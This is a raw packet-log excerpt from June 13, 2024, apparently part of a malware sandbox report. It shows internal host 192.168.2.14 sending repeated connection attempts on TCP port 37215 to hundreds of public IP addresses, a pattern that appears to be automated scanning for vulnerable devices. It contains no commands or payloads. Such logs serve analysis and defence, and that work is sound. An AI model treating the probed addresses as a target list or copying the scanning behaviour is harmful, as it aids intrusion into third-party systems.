                                                        Jun 13, 2024 21:31:59.197310925 CEST3890637215192.168.2.14197.40.176.8
                                                        Jun 13, 2024 21:31:59.197312117 CEST3299437215192.168.2.14156.178.175.24
                                                        Jun 13, 2024 21:31:59.197314024 CEST3721540352197.180.35.86192.168.2.14
                                                        Jun 13, 2024 21:31:59.197328091 CEST3721533988156.141.134.112192.168.2.14
                                                        Jun 13, 2024 21:31:59.197329998 CEST6036637215192.168.2.14156.58.220.239
                                                        Jun 13, 2024 21:31:59.197329998 CEST6036637215192.168.2.14156.58.220.239
                                                        Jun 13, 2024 21:31:59.197331905 CEST3317437215192.168.2.14156.178.175.24
                                                        Jun 13, 2024 21:31:59.197340012 CEST3721548496156.99.248.102192.168.2.14
                                                        Jun 13, 2024 21:31:59.197350979 CEST6054637215192.168.2.14156.58.220.239
                                                        Jun 13, 2024 21:31:59.197359085 CEST4035237215192.168.2.14197.180.35.86
                                                        Jun 13, 2024 21:31:59.197362900 CEST3398837215192.168.2.14156.141.134.112
                                                        Jun 13, 2024 21:31:59.197407961 CEST5186237215192.168.2.14197.36.55.1
                                                        Jun 13, 2024 21:31:59.197407961 CEST5186237215192.168.2.14197.36.55.1
                                                        Jun 13, 2024 21:31:59.197427988 CEST5204237215192.168.2.14197.36.55.1
                                                        Jun 13, 2024 21:31:59.197439909 CEST3721543852156.254.199.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.197443962 CEST3890637215192.168.2.14197.40.176.8
                                                        Jun 13, 2024 21:31:59.197443962 CEST3890637215192.168.2.14197.40.176.8
                                                        Jun 13, 2024 21:31:59.197467089 CEST3721556970156.96.157.43192.168.2.14
                                                        Jun 13, 2024 21:31:59.197474003 CEST3398837215192.168.2.14156.141.134.112
                                                        Jun 13, 2024 21:31:59.197474003 CEST3398837215192.168.2.14156.141.134.112
                                                        Jun 13, 2024 21:31:59.197479963 CEST3908637215192.168.2.14197.40.176.8
                                                        Jun 13, 2024 21:31:59.197479963 CEST372155827841.187.7.24192.168.2.14
                                                        Jun 13, 2024 21:31:59.197493076 CEST372154608441.168.245.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.197499037 CEST5697037215192.168.2.14156.96.157.43
                                                        Jun 13, 2024 21:31:59.197505951 CEST3721550224197.187.191.53192.168.2.14
                                                        Jun 13, 2024 21:31:59.197510004 CEST3416637215192.168.2.14156.141.134.112
                                                        Jun 13, 2024 21:31:59.197510958 CEST5827837215192.168.2.1441.187.7.24
                                                        Jun 13, 2024 21:31:59.197521925 CEST3721540710197.142.93.6192.168.2.14
                                                        Jun 13, 2024 21:31:59.197535992 CEST3721554426156.207.60.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.197546005 CEST5022437215192.168.2.14197.187.191.53
                                                        Jun 13, 2024 21:31:59.197549105 CEST4053437215192.168.2.14197.180.35.86
                                                        Jun 13, 2024 21:31:59.197555065 CEST372155989241.1.47.57192.168.2.14
                                                        Jun 13, 2024 21:31:59.197560072 CEST4035237215192.168.2.14197.180.35.86
                                                        Jun 13, 2024 21:31:59.197560072 CEST4035237215192.168.2.14197.180.35.86
                                                        Jun 13, 2024 21:31:59.197562933 CEST4071037215192.168.2.14197.142.93.6
                                                        Jun 13, 2024 21:31:59.197566032 CEST5442637215192.168.2.14156.207.60.191
                                                        Jun 13, 2024 21:31:59.197571993 CEST5697037215192.168.2.14156.96.157.43
                                                        Jun 13, 2024 21:31:59.197577000 CEST5697037215192.168.2.14156.96.157.43
                                                        Jun 13, 2024 21:31:59.197593927 CEST372153760641.231.104.194192.168.2.14
                                                        Jun 13, 2024 21:31:59.197608948 CEST3721536920156.77.39.5192.168.2.14
                                                        Jun 13, 2024 21:31:59.197612047 CEST5989237215192.168.2.1441.1.47.57
                                                        Jun 13, 2024 21:31:59.197613001 CEST5827837215192.168.2.1441.187.7.24
                                                        Jun 13, 2024 21:31:59.197613001 CEST5715037215192.168.2.14156.96.157.43
                                                        Jun 13, 2024 21:31:59.197613001 CEST5827837215192.168.2.1441.187.7.24
                                                        Jun 13, 2024 21:31:59.197619915 CEST5845837215192.168.2.1441.187.7.24
                                                        Jun 13, 2024 21:31:59.197623014 CEST372154298041.169.161.144192.168.2.14
                                                        Jun 13, 2024 21:31:59.197633028 CEST5022437215192.168.2.14197.187.191.53
                                                        Jun 13, 2024 21:31:59.197633028 CEST5022437215192.168.2.14197.187.191.53
                                                        Jun 13, 2024 21:31:59.197643995 CEST5040437215192.168.2.14197.187.191.53
                                                        Jun 13, 2024 21:31:59.197658062 CEST3760637215192.168.2.1441.231.104.194
                                                        Jun 13, 2024 21:31:59.197660923 CEST3692037215192.168.2.14156.77.39.5
                                                        Jun 13, 2024 21:31:59.197679043 CEST4071037215192.168.2.14197.142.93.6
                                                        Jun 13, 2024 21:31:59.197679043 CEST4071037215192.168.2.14197.142.93.6
                                                        Jun 13, 2024 21:31:59.197683096 CEST3721554294156.8.228.71192.168.2.14
                                                        Jun 13, 2024 21:31:59.197691917 CEST4089037215192.168.2.14197.142.93.6
                                                        Jun 13, 2024 21:31:59.197700024 CEST3721543894197.161.140.105192.168.2.14
                                                        Jun 13, 2024 21:31:59.197720051 CEST5429437215192.168.2.14156.8.228.71
                                                        Jun 13, 2024 21:31:59.197735071 CEST5442637215192.168.2.14156.207.60.191
                                                        Jun 13, 2024 21:31:59.197735071 CEST4389437215192.168.2.14197.161.140.105
                                                        Jun 13, 2024 21:31:59.197735071 CEST5442637215192.168.2.14156.207.60.191
                                                        Jun 13, 2024 21:31:59.197746038 CEST5460637215192.168.2.14156.207.60.191
                                                        Jun 13, 2024 21:31:59.197767019 CEST5989237215192.168.2.1441.1.47.57
                                                        Jun 13, 2024 21:31:59.197767019 CEST5989237215192.168.2.1441.1.47.57
                                                        Jun 13, 2024 21:31:59.197782993 CEST6007237215192.168.2.1441.1.47.57
                                                        Jun 13, 2024 21:31:59.197803020 CEST3778637215192.168.2.1441.231.104.194
                                                        Jun 13, 2024 21:31:59.197819948 CEST3692037215192.168.2.14156.77.39.5
                                                        Jun 13, 2024 21:31:59.197819948 CEST3692037215192.168.2.14156.77.39.5
                                                        Jun 13, 2024 21:31:59.197824955 CEST3760637215192.168.2.1441.231.104.194
                                                        Jun 13, 2024 21:31:59.197824955 CEST3760637215192.168.2.1441.231.104.194
                                                        Jun 13, 2024 21:31:59.197835922 CEST3710037215192.168.2.14156.77.39.5
                                                        Jun 13, 2024 21:31:59.197865009 CEST5429437215192.168.2.14156.8.228.71
                                                        Jun 13, 2024 21:31:59.197865009 CEST5429437215192.168.2.14156.8.228.71
                                                        Jun 13, 2024 21:31:59.197870970 CEST5447437215192.168.2.14156.8.228.71
                                                        Jun 13, 2024 21:31:59.197884083 CEST4389437215192.168.2.14197.161.140.105
                                                        Jun 13, 2024 21:31:59.197884083 CEST4389437215192.168.2.14197.161.140.105
                                                        Jun 13, 2024 21:31:59.197901964 CEST4407437215192.168.2.14197.161.140.105
                                                        Jun 13, 2024 21:31:59.197911024 CEST3721554750156.146.188.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.197925091 CEST3721543540197.122.188.250192.168.2.14
                                                        Jun 13, 2024 21:31:59.197937965 CEST372154278041.124.145.165192.168.2.14
                                                        Jun 13, 2024 21:31:59.197959900 CEST4354037215192.168.2.14197.122.188.250
                                                        Jun 13, 2024 21:31:59.197964907 CEST372155922641.89.98.0192.168.2.14
                                                        Jun 13, 2024 21:31:59.197973013 CEST4278037215192.168.2.1441.124.145.165
                                                        Jun 13, 2024 21:31:59.197977066 CEST3721554862156.75.209.109192.168.2.14
                                                        Jun 13, 2024 21:31:59.197990894 CEST372154264241.2.128.246192.168.2.14
                                                        Jun 13, 2024 21:31:59.197999001 CEST5922637215192.168.2.1441.89.98.0
                                                        Jun 13, 2024 21:31:59.198004961 CEST3721553248197.195.180.119192.168.2.14
                                                        Jun 13, 2024 21:31:59.198018074 CEST4354037215192.168.2.14197.122.188.250
                                                        Jun 13, 2024 21:31:59.198018074 CEST4354037215192.168.2.14197.122.188.250
                                                        Jun 13, 2024 21:31:59.198031902 CEST4372037215192.168.2.14197.122.188.250
                                                        Jun 13, 2024 21:31:59.198033094 CEST4264237215192.168.2.1441.2.128.246
                                                        Jun 13, 2024 21:31:59.198033094 CEST5324837215192.168.2.14197.195.180.119
                                                        Jun 13, 2024 21:31:59.198035955 CEST3721556362156.35.158.141192.168.2.14
                                                        Jun 13, 2024 21:31:59.198038101 CEST4278037215192.168.2.1441.124.145.165
                                                        Jun 13, 2024 21:31:59.198038101 CEST4278037215192.168.2.1441.124.145.165
                                                        Jun 13, 2024 21:31:59.198051929 CEST372155810041.26.181.224192.168.2.14
                                                        Jun 13, 2024 21:31:59.198056936 CEST4296037215192.168.2.1441.124.145.165
                                                        Jun 13, 2024 21:31:59.198075056 CEST5636237215192.168.2.14156.35.158.141
                                                        Jun 13, 2024 21:31:59.198076963 CEST3721555588156.237.117.182192.168.2.14
                                                        Jun 13, 2024 21:31:59.198084116 CEST5810037215192.168.2.1441.26.181.224
                                                        Jun 13, 2024 21:31:59.198091984 CEST3721542270156.13.175.64192.168.2.14
                                                        Jun 13, 2024 21:31:59.198112965 CEST5922637215192.168.2.1441.89.98.0
                                                        Jun 13, 2024 21:31:59.198112965 CEST5922637215192.168.2.1441.89.98.0
                                                        Jun 13, 2024 21:31:59.198117971 CEST372154989441.146.178.217192.168.2.14
                                                        Jun 13, 2024 21:31:59.198124886 CEST4227037215192.168.2.14156.13.175.64
                                                        Jun 13, 2024 21:31:59.198142052 CEST4264237215192.168.2.1441.2.128.246
                                                        Jun 13, 2024 21:31:59.198143005 CEST3721558830156.115.1.221192.168.2.14
                                                        Jun 13, 2024 21:31:59.198142052 CEST4264237215192.168.2.1441.2.128.246
                                                        Jun 13, 2024 21:31:59.198143959 CEST5940637215192.168.2.1441.89.98.0
                                                        Jun 13, 2024 21:31:59.198163986 CEST4282237215192.168.2.1441.2.128.246
                                                        Jun 13, 2024 21:31:59.198163986 CEST5324837215192.168.2.14197.195.180.119
                                                        Jun 13, 2024 21:31:59.198163986 CEST5324837215192.168.2.14197.195.180.119
                                                        Jun 13, 2024 21:31:59.198173046 CEST3721547700197.82.233.43192.168.2.14
                                                        Jun 13, 2024 21:31:59.198183060 CEST5883037215192.168.2.14156.115.1.221
                                                        Jun 13, 2024 21:31:59.198187113 CEST372154011441.165.223.247192.168.2.14
                                                        Jun 13, 2024 21:31:59.198201895 CEST5342837215192.168.2.14197.195.180.119
                                                        Jun 13, 2024 21:31:59.198225975 CEST5636237215192.168.2.14156.35.158.141
                                                        Jun 13, 2024 21:31:59.198225975 CEST5636237215192.168.2.14156.35.158.141
                                                        Jun 13, 2024 21:31:59.198247910 CEST5654237215192.168.2.14156.35.158.141
                                                        Jun 13, 2024 21:31:59.198270082 CEST5828037215192.168.2.1441.26.181.224
                                                        Jun 13, 2024 21:31:59.198270082 CEST5810037215192.168.2.1441.26.181.224
                                                        Jun 13, 2024 21:31:59.198270082 CEST5810037215192.168.2.1441.26.181.224
                                                        Jun 13, 2024 21:31:59.198292017 CEST4227037215192.168.2.14156.13.175.64
                                                        Jun 13, 2024 21:31:59.198292017 CEST4227037215192.168.2.14156.13.175.64
                                                        Jun 13, 2024 21:31:59.198302031 CEST4245037215192.168.2.14156.13.175.64
                                                        Jun 13, 2024 21:31:59.198313951 CEST5883037215192.168.2.14156.115.1.221
                                                        Jun 13, 2024 21:31:59.198313951 CEST5883037215192.168.2.14156.115.1.221
                                                        Jun 13, 2024 21:31:59.198338032 CEST5901037215192.168.2.14156.115.1.221
                                                        Jun 13, 2024 21:31:59.198504925 CEST3721555026197.54.176.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.198518991 CEST372155125441.29.99.140192.168.2.14
                                                        Jun 13, 2024 21:31:59.198544025 CEST3721544694197.52.185.92192.168.2.14
                                                        Jun 13, 2024 21:31:59.198559046 CEST3721532938197.171.201.221192.168.2.14
                                                        Jun 13, 2024 21:31:59.198571920 CEST372153696441.39.143.235192.168.2.14
                                                        Jun 13, 2024 21:31:59.198582888 CEST4469437215192.168.2.14197.52.185.92
                                                        Jun 13, 2024 21:31:59.198585033 CEST3721544970197.235.39.79192.168.2.14
                                                        Jun 13, 2024 21:31:59.198590994 CEST5125437215192.168.2.1441.29.99.140
                                                        Jun 13, 2024 21:31:59.198590994 CEST5125437215192.168.2.1441.29.99.140
                                                        Jun 13, 2024 21:31:59.198591948 CEST3293837215192.168.2.14197.171.201.221
                                                        Jun 13, 2024 21:31:59.198597908 CEST3721538868197.103.31.12192.168.2.14
                                                        Jun 13, 2024 21:31:59.198611975 CEST5125437215192.168.2.1441.29.99.140
                                                        Jun 13, 2024 21:31:59.198626995 CEST3721549718197.221.63.142192.168.2.14
                                                        Jun 13, 2024 21:31:59.198632956 CEST5143437215192.168.2.1441.29.99.140
                                                        Jun 13, 2024 21:31:59.198637962 CEST3886837215192.168.2.14197.103.31.12
                                                        Jun 13, 2024 21:31:59.198641062 CEST3721557352197.191.97.104192.168.2.14
                                                        Jun 13, 2024 21:31:59.198652983 CEST3721555282197.54.176.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.198662996 CEST4971837215192.168.2.14197.221.63.142
                                                        Jun 13, 2024 21:31:59.198664904 CEST372154037041.165.223.247192.168.2.14
                                                        Jun 13, 2024 21:31:59.198678017 CEST4469437215192.168.2.14197.52.185.92
                                                        Jun 13, 2024 21:31:59.198688984 CEST4469437215192.168.2.14197.52.185.92
                                                        Jun 13, 2024 21:31:59.198690891 CEST3721547956197.82.233.43192.168.2.14
                                                        Jun 13, 2024 21:31:59.198693037 CEST4487437215192.168.2.14197.52.185.92
                                                        Jun 13, 2024 21:31:59.198704958 CEST372155015041.146.178.217192.168.2.14
                                                        Jun 13, 2024 21:31:59.198718071 CEST3293837215192.168.2.14197.171.201.221
                                                        Jun 13, 2024 21:31:59.198718071 CEST372155046641.26.109.199192.168.2.14
                                                        Jun 13, 2024 21:31:59.198718071 CEST3293837215192.168.2.14197.171.201.221
                                                        Jun 13, 2024 21:31:59.198734045 CEST3721539638197.254.81.101192.168.2.14
                                                        Jun 13, 2024 21:31:59.198745966 CEST3311837215192.168.2.14197.171.201.221
                                                        Jun 13, 2024 21:31:59.198748112 CEST372154455641.148.5.11192.168.2.14
                                                        Jun 13, 2024 21:31:59.198761940 CEST3721555118156.75.209.109192.168.2.14
                                                        Jun 13, 2024 21:31:59.198774099 CEST3721547946156.223.32.71192.168.2.14
                                                        Jun 13, 2024 21:31:59.198777914 CEST3886837215192.168.2.14197.103.31.12
                                                        Jun 13, 2024 21:31:59.198777914 CEST3886837215192.168.2.14197.103.31.12
                                                        Jun 13, 2024 21:31:59.198786020 CEST372153950641.15.178.30192.168.2.14
                                                        Jun 13, 2024 21:31:59.198796034 CEST3904837215192.168.2.14197.103.31.12
                                                        Jun 13, 2024 21:31:59.198798895 CEST3721542490156.163.40.29192.168.2.14
                                                        Jun 13, 2024 21:31:59.198812008 CEST372155127041.62.90.19192.168.2.14
                                                        Jun 13, 2024 21:31:59.198822975 CEST3721542702197.192.232.136192.168.2.14
                                                        Jun 13, 2024 21:31:59.198834896 CEST3721559510156.137.45.2192.168.2.14
                                                        Jun 13, 2024 21:31:59.198846102 CEST4971837215192.168.2.14197.221.63.142
                                                        Jun 13, 2024 21:31:59.198847055 CEST3721537176197.175.159.181192.168.2.14
                                                        Jun 13, 2024 21:31:59.198846102 CEST4971837215192.168.2.14197.221.63.142
                                                        Jun 13, 2024 21:31:59.198859930 CEST372156045641.23.35.41192.168.2.14
                                                        Jun 13, 2024 21:31:59.198864937 CEST4989837215192.168.2.14197.221.63.142
                                                        Jun 13, 2024 21:31:59.198873043 CEST3721542562197.222.41.238192.168.2.14
                                                        Jun 13, 2024 21:31:59.198884964 CEST372154634041.168.245.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.198898077 CEST3721544108156.254.199.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.198911905 CEST3721555822156.102.62.53192.168.2.14
                                                        Jun 13, 2024 21:31:59.198924065 CEST3721558026197.82.75.9192.168.2.14
                                                        Jun 13, 2024 21:31:59.198935986 CEST372154593241.160.194.101192.168.2.14
                                                        Jun 13, 2024 21:31:59.198960066 CEST3721542812197.51.77.50192.168.2.14
                                                        Jun 13, 2024 21:31:59.198976040 CEST3721536008197.209.113.82192.168.2.14
                                                        Jun 13, 2024 21:31:59.198988914 CEST3721546582156.230.224.2192.168.2.14
                                                        Jun 13, 2024 21:31:59.199001074 CEST3721540802156.116.142.15192.168.2.14
                                                        Jun 13, 2024 21:31:59.199012995 CEST372154937841.0.221.87192.168.2.14
                                                        Jun 13, 2024 21:31:59.199026108 CEST3721538742156.127.173.223192.168.2.14
                                                        Jun 13, 2024 21:31:59.199038982 CEST3721550728197.68.100.216192.168.2.14
                                                        Jun 13, 2024 21:31:59.199052095 CEST3721534540197.3.237.232192.168.2.14
                                                        Jun 13, 2024 21:31:59.199063063 CEST3721544196156.139.143.212192.168.2.14
                                                        Jun 13, 2024 21:31:59.199083090 CEST3721557598156.43.161.30192.168.2.14
                                                        Jun 13, 2024 21:31:59.199105024 CEST372154029041.197.76.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.199117899 CEST3721559662156.113.81.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.199130058 CEST3721552894156.87.162.197192.168.2.14
                                                        Jun 13, 2024 21:31:59.199141979 CEST3721540478156.46.236.126192.168.2.14
                                                        Jun 13, 2024 21:31:59.199156046 CEST372154992441.185.24.48192.168.2.14
                                                        Jun 13, 2024 21:31:59.199167967 CEST3721558612197.156.227.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.199179888 CEST3721553568156.51.67.83192.168.2.14
                                                        Jun 13, 2024 21:31:59.199192047 CEST372156043041.211.73.143192.168.2.14
                                                        Jun 13, 2024 21:31:59.199203014 CEST3721545422197.79.223.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.199214935 CEST3721559130197.82.79.222192.168.2.14
                                                        Jun 13, 2024 21:31:59.199227095 CEST3721558386197.8.72.118192.168.2.14
                                                        Jun 13, 2024 21:31:59.199240923 CEST3721547280197.127.43.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.199255943 CEST372153600841.225.65.168192.168.2.14
                                                        Jun 13, 2024 21:31:59.199275017 CEST372154541441.128.20.245192.168.2.14
                                                        Jun 13, 2024 21:31:59.199286938 CEST3721545496197.166.240.196192.168.2.14
                                                        Jun 13, 2024 21:31:59.199300051 CEST372154201441.134.28.73192.168.2.14
                                                        Jun 13, 2024 21:31:59.199312925 CEST372155134841.86.228.153192.168.2.14
                                                        Jun 13, 2024 21:31:59.199325085 CEST3721557102156.228.20.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.199337006 CEST3721558966156.199.116.168192.168.2.14
                                                        Jun 13, 2024 21:31:59.199348927 CEST372154759841.152.29.217192.168.2.14
                                                        Jun 13, 2024 21:31:59.199359894 CEST3721536304156.126.25.234192.168.2.14
                                                        Jun 13, 2024 21:31:59.199373007 CEST372154778441.116.41.50192.168.2.14
                                                        Jun 13, 2024 21:31:59.199384928 CEST3721560336197.49.72.102192.168.2.14
                                                        Jun 13, 2024 21:31:59.199397087 CEST3721558414156.116.143.128192.168.2.14
                                                        Jun 13, 2024 21:31:59.199409008 CEST3721557348197.59.241.93192.168.2.14
                                                        Jun 13, 2024 21:31:59.199419975 CEST372155231641.22.200.117192.168.2.14
                                                        Jun 13, 2024 21:31:59.199431896 CEST3721553958197.39.96.114192.168.2.14
                                                        Jun 13, 2024 21:31:59.199444056 CEST372153482641.62.52.162192.168.2.14
                                                        Jun 13, 2024 21:31:59.199455976 CEST3721543748197.48.44.114192.168.2.14
                                                        Jun 13, 2024 21:31:59.199466944 CEST372153670241.53.218.229192.168.2.14
                                                        Jun 13, 2024 21:31:59.199480057 CEST3721536218156.183.60.101192.168.2.14
                                                        Jun 13, 2024 21:31:59.199492931 CEST3721551052156.107.63.120192.168.2.14
                                                        Jun 13, 2024 21:31:59.199506998 CEST372155303041.248.134.251192.168.2.14
                                                        Jun 13, 2024 21:31:59.199521065 CEST3721558588197.25.6.232192.168.2.14
                                                        Jun 13, 2024 21:31:59.199533939 CEST3721555414156.17.97.42192.168.2.14
                                                        Jun 13, 2024 21:31:59.199547052 CEST3721533952197.111.190.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.199559927 CEST372154865441.77.195.149192.168.2.14
                                                        Jun 13, 2024 21:31:59.199573040 CEST3721535190197.2.27.218192.168.2.14
                                                        Jun 13, 2024 21:31:59.199585915 CEST372155530441.128.90.49192.168.2.14
                                                        Jun 13, 2024 21:31:59.199596882 CEST372153566441.191.223.228192.168.2.14
                                                        Jun 13, 2024 21:31:59.199609995 CEST3721540886197.126.143.178192.168.2.14
                                                        Jun 13, 2024 21:31:59.199621916 CEST3721552486197.208.79.238192.168.2.14
                                                        Jun 13, 2024 21:31:59.199634075 CEST3721536256156.119.120.12192.168.2.14
                                                        Jun 13, 2024 21:31:59.199645996 CEST372154455841.37.97.58192.168.2.14
                                                        Jun 13, 2024 21:31:59.199659109 CEST372155959441.189.211.206192.168.2.14
                                                        Jun 13, 2024 21:31:59.199671030 CEST372155831241.135.131.164192.168.2.14
                                                        Jun 13, 2024 21:31:59.199683905 CEST3721538184197.145.154.253192.168.2.14
                                                        Jun 13, 2024 21:31:59.199696064 CEST3721553142156.131.45.177192.168.2.14
                                                        Jun 13, 2024 21:31:59.199708939 CEST3721546058156.52.65.236192.168.2.14
                                                        Jun 13, 2024 21:31:59.199721098 CEST3721536628156.164.61.20192.168.2.14
                                                        Jun 13, 2024 21:31:59.199733973 CEST372155854241.160.6.160192.168.2.14
                                                        Jun 13, 2024 21:31:59.199742079 CEST5314237215192.168.2.14156.131.45.177
                                                        Jun 13, 2024 21:31:59.199748039 CEST372154830241.11.160.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.199752092 CEST4605837215192.168.2.14156.52.65.236
                                                        Jun 13, 2024 21:31:59.199760914 CEST3721544660156.234.131.16192.168.2.14
                                                        Jun 13, 2024 21:31:59.199769974 CEST5854237215192.168.2.1441.160.6.160
                                                        Jun 13, 2024 21:31:59.199778080 CEST372155531241.84.165.58192.168.2.14
                                                        Jun 13, 2024 21:31:59.199784994 CEST4830237215192.168.2.1441.11.160.248
                                                        Jun 13, 2024 21:31:59.199795008 CEST4466037215192.168.2.14156.234.131.16
                                                        Jun 13, 2024 21:31:59.199806929 CEST3721540774156.14.18.99192.168.2.14
                                                        Jun 13, 2024 21:31:59.199810028 CEST5531237215192.168.2.1441.84.165.58
                                                        Jun 13, 2024 21:31:59.199820995 CEST372155436641.91.46.56192.168.2.14
                                                        Jun 13, 2024 21:31:59.199837923 CEST4077437215192.168.2.14156.14.18.99
                                                        Jun 13, 2024 21:31:59.199862003 CEST3721559522156.93.196.251192.168.2.14
                                                        Jun 13, 2024 21:31:59.199872017 CEST5314237215192.168.2.14156.131.45.177
                                                        Jun 13, 2024 21:31:59.199872017 CEST5314237215192.168.2.14156.131.45.177
                                                        Jun 13, 2024 21:31:59.199875116 CEST5436637215192.168.2.1441.91.46.56
                                                        Jun 13, 2024 21:31:59.199877024 CEST372153987041.17.85.190192.168.2.14
                                                        Jun 13, 2024 21:31:59.199889898 CEST5332237215192.168.2.14156.131.45.177
                                                        Jun 13, 2024 21:31:59.199891090 CEST3721536830197.192.218.206192.168.2.14
                                                        Jun 13, 2024 21:31:59.199902058 CEST5952237215192.168.2.14156.93.196.251
                                                        Jun 13, 2024 21:31:59.199903965 CEST3721545706156.167.30.215192.168.2.14
                                                        Jun 13, 2024 21:31:59.199914932 CEST3987037215192.168.2.1441.17.85.190
                                                        Jun 13, 2024 21:31:59.199935913 CEST4570637215192.168.2.14156.167.30.215
                                                        Jun 13, 2024 21:31:59.199945927 CEST4623837215192.168.2.14156.52.65.236
                                                        Jun 13, 2024 21:31:59.199956894 CEST3721553646197.116.183.242192.168.2.14
                                                        Jun 13, 2024 21:31:59.199959040 CEST4605837215192.168.2.14156.52.65.236
                                                        Jun 13, 2024 21:31:59.199959040 CEST4605837215192.168.2.14156.52.65.236
                                                        Jun 13, 2024 21:31:59.199966908 CEST5854237215192.168.2.1441.160.6.160
                                                        Jun 13, 2024 21:31:59.199966908 CEST5854237215192.168.2.1441.160.6.160
                                                        Jun 13, 2024 21:31:59.199984074 CEST5872237215192.168.2.1441.160.6.160
                                                        Jun 13, 2024 21:31:59.199984074 CEST3721534088156.165.95.110192.168.2.14
                                                        Jun 13, 2024 21:31:59.199995041 CEST4466037215192.168.2.14156.234.131.16
                                                        Jun 13, 2024 21:31:59.199995041 CEST4466037215192.168.2.14156.234.131.16
                                                        Jun 13, 2024 21:31:59.200014114 CEST4483837215192.168.2.14156.234.131.16
                                                        Jun 13, 2024 21:31:59.200030088 CEST4830237215192.168.2.1441.11.160.248
                                                        Jun 13, 2024 21:31:59.200030088 CEST4830237215192.168.2.1441.11.160.248
                                                        Jun 13, 2024 21:31:59.200035095 CEST3721537490197.209.154.175192.168.2.14
                                                        Jun 13, 2024 21:31:59.200045109 CEST4848437215192.168.2.1441.11.160.248
                                                        Jun 13, 2024 21:31:59.200056076 CEST4077437215192.168.2.14156.14.18.99
                                                        Jun 13, 2024 21:31:59.200056076 CEST4077437215192.168.2.14156.14.18.99
                                                        Jun 13, 2024 21:31:59.200063944 CEST3721537284156.78.43.67192.168.2.14
                                                        Jun 13, 2024 21:31:59.200077057 CEST3721548450156.238.222.107192.168.2.14
                                                        Jun 13, 2024 21:31:59.200078964 CEST4095237215192.168.2.14156.14.18.99
                                                        Jun 13, 2024 21:31:59.200084925 CEST5531237215192.168.2.1441.84.165.58
                                                        Jun 13, 2024 21:31:59.200088978 CEST3721537464156.78.43.67192.168.2.14
                                                        Jun 13, 2024 21:31:59.200090885 CEST5531237215192.168.2.1441.84.165.58
                                                        Jun 13, 2024 21:31:59.200102091 CEST3721533566156.10.114.158192.168.2.14
                                                        Jun 13, 2024 21:31:59.200119019 CEST5549437215192.168.2.1441.84.165.58
                                                        Jun 13, 2024 21:31:59.200119972 CEST3721533746156.10.114.158192.168.2.14
                                                        Jun 13, 2024 21:31:59.200120926 CEST3746437215192.168.2.14156.78.43.67
                                                        Jun 13, 2024 21:31:59.200134039 CEST372155280441.111.224.37192.168.2.14
                                                        Jun 13, 2024 21:31:59.200146914 CEST3746437215192.168.2.14156.78.43.67
                                                        Jun 13, 2024 21:31:59.200149059 CEST3374637215192.168.2.14156.10.114.158
                                                        Jun 13, 2024 21:31:59.200154066 CEST3721558560156.45.190.231192.168.2.14
                                                        Jun 13, 2024 21:31:59.200162888 CEST5436637215192.168.2.1441.91.46.56
                                                        Jun 13, 2024 21:31:59.200162888 CEST5436637215192.168.2.1441.91.46.56
                                                        Jun 13, 2024 21:31:59.200190067 CEST5454637215192.168.2.1441.91.46.56
                                                        Jun 13, 2024 21:31:59.200200081 CEST5952237215192.168.2.14156.93.196.251
                                                        Jun 13, 2024 21:31:59.200201035 CEST5970237215192.168.2.14156.93.196.251
                                                        Jun 13, 2024 21:31:59.200200081 CEST5952237215192.168.2.14156.93.196.251
                                                        Jun 13, 2024 21:31:59.200228930 CEST3374637215192.168.2.14156.10.114.158
                                                        Jun 13, 2024 21:31:59.200231075 CEST372155298241.111.224.37192.168.2.14
                                                        Jun 13, 2024 21:31:59.200244904 CEST372155171041.55.60.186192.168.2.14
                                                        Jun 13, 2024 21:31:59.200246096 CEST3987037215192.168.2.1441.17.85.190
                                                        Jun 13, 2024 21:31:59.200246096 CEST3987037215192.168.2.1441.17.85.190
                                                        Jun 13, 2024 21:31:59.200258017 CEST372155189241.55.60.186192.168.2.14
                                                        Jun 13, 2024 21:31:59.200268030 CEST4005037215192.168.2.1441.17.85.190
                                                        Jun 13, 2024 21:31:59.200268030 CEST5298237215192.168.2.1441.111.224.37
                                                        Jun 13, 2024 21:31:59.200270891 CEST372154938041.72.198.137192.168.2.14
                                                        Jun 13, 2024 21:31:59.200284004 CEST4570637215192.168.2.14156.167.30.215
                                                        Jun 13, 2024 21:31:59.200284004 CEST372154956041.72.198.137192.168.2.14
                                                        Jun 13, 2024 21:31:59.200284004 CEST4570637215192.168.2.14156.167.30.215
                                                        Jun 13, 2024 21:31:59.200299025 CEST5189237215192.168.2.1441.55.60.186
                                                        Jun 13, 2024 21:31:59.200299025 CEST4588637215192.168.2.14156.167.30.215
                                                        Jun 13, 2024 21:31:59.200299025 CEST5189237215192.168.2.1441.55.60.186
                                                        Jun 13, 2024 21:31:59.200313091 CEST4956037215192.168.2.1441.72.198.137
                                                        Jun 13, 2024 21:31:59.200319052 CEST5298237215192.168.2.1441.111.224.37
                                                        Jun 13, 2024 21:31:59.200325012 CEST4956037215192.168.2.1441.72.198.137
                                                        Jun 13, 2024 21:31:59.200345993 CEST3721555362197.232.150.242192.168.2.14
                                                        Jun 13, 2024 21:31:59.200359106 CEST3721552912156.210.147.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.200371027 CEST3721553092156.210.147.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.200383902 CEST372153329041.112.54.198192.168.2.14
                                                        Jun 13, 2024 21:31:59.200412035 CEST5309237215192.168.2.14156.210.147.248
                                                        Jun 13, 2024 21:31:59.200417042 CEST3329037215192.168.2.1441.112.54.198
                                                        Jun 13, 2024 21:31:59.200422049 CEST5309237215192.168.2.14156.210.147.248
                                                        Jun 13, 2024 21:31:59.200443029 CEST3329037215192.168.2.1441.112.54.198
                                                        Jun 13, 2024 21:31:59.200500011 CEST372153311041.112.54.198192.168.2.14
                                                        Jun 13, 2024 21:31:59.200512886 CEST372155634041.98.175.117192.168.2.14
